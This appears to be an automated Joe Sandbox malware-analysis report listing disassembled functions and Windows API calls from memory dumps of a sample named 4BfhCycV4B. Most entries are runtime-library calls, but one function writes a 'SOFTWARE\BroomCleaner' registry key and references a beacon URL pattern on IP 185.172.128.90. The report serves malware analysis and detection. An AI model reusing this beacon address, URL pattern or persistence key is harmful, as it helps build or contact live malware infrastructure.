                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 04214F5B
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04214FCC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04214FE5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215017
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215020
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421502C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                                                                        • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 231c2a6dbb4a733bfdca2a45ab7275dab257816d97da2a85fd971ee4d547d3bb
                                                                                                                                                                                                                                                                                        • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 231c2a6dbb4a733bfdca2a45ab7275dab257816d97da2a85fd971ee4d547d3bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                                                                        • Instruction ID: d99150221146ad311adce6574623f1486cf6a46c54eef08db8b6b0b68b2392e6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C61F671F20205AFEB20DFA4C841B9EBBF5EF64310F15416AD955EB260EB70B941CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                                                                        • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,042163EF,?,?,?,?,?,?), ref: 04215CBC
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 04215D37
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 04215D52
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04215D78
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,042163EF,00000000,?,?,?,?,?,?,?,?,?,042163EF,?), ref: 04215D97
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,042163EF,00000000,?,?,?,?,?,?,?,?,?,042163EF,?), ref: 04215DD0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                                                                        • Instruction ID: 878c693da04125292b90371bbbb9a0a0f1d1f7433cde769a170255b5f33a66b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C51F670F10209AFDB14CFA8D884AEEBBF8EF58300F14409AE541E72A1D770A591CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0420141C
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0420142E
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0420146B
                                                                                                                                                                                                                                                                                          • Part of subcall function 042080E1: _Yarn.LIBCPMT ref: 04208100
                                                                                                                                                                                                                                                                                          • Part of subcall function 042080E1: _Yarn.LIBCPMT ref: 04208124
                                                                                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0420148C
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0420149A
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 042014BD
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0420152E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 835844855-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0422639B
                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 042263C3
                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 04226446
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04226467
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0421F38A: _free.LIBCMT ref: 0421F3B3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F691
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F69C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F6A7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F6FB
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F706
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F711
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F71C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04216BF7,00000001,00000001,?), ref: 04216A00
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04216BF7,00000001,00000001,?,?,?,?), ref: 04216A86
